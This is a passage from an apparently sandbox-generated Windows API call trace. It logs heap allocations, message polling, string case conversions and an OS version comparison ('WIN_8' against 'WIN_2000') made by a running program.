wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0124.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0124.249] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0124.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0124.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0124.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0124.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0124.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0124.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0124.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0124.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0124.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0124.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0124.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0124.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0124.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0124.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0124.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0124.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0124.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0124.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0124.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0124.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0124.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0124.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0124.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0124.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0124.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0124.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0124.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a684e8 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0124.252] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa138 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0124.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa048 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0124.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0124.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0124.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0124.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0124.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0124.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0124.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0124.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0124.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0124.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0124.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0124.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0124.254] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0124.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0124.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa180 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0124.254] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0124.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0124.254] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0124.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0124.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0124.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0124.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0124.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0124.254] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0124.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0124.254] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0124.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0124.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0124.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, 